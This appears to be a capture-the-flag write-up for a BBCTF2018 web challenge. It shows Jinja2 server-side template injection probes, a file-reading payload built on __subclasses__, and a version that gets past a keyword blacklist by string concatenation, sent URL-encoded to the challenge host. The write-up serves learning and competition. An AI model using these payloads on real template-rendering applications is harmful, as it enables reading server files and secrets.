Skip to content

Instantly share code, notes, and snippets.

@aadityapurani aadityapurani/README.md
Last active Apr 8, 2018

Embed
What would you like to do?
hard_to_hack (web 400) - BBCTF2018

Hard_To_Hack (Web 400) - BBCTF2018

Test Condition: {{'7'*7}} Config : {{config}} Request not blocked : {{request}}

After successive tries, figured out class keyword was blacklisted and so did many important keywords. But we can use + to concat two strings and use it.

General file reading payload for Jinja2 is {{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}

But some keywords were blocked. So split and profit

{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('fl'+'ag', 'r').read()}}

This acts same as the above payload due to the property access (http://jinja.pocoo.org/docs/2.10/templates/)

Hence, you send it after URL encoding http://web.euristica.in/hard_to_hack/index?data=%7B%7B%27%27%5B%27__cla%27%2B%27ss__%27%5D%5B%27__mr%27%2B%27o__%27%5D%5B2%5D%5B%27__subcla%27%2B%27sses__%27%5D()%5B40%5D(%27fl%27%2B%27ag%27%2C%20%27r%27).read()%7D%7D

flag{BlackListing_N3Ver_H3lp3d_An40ne}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.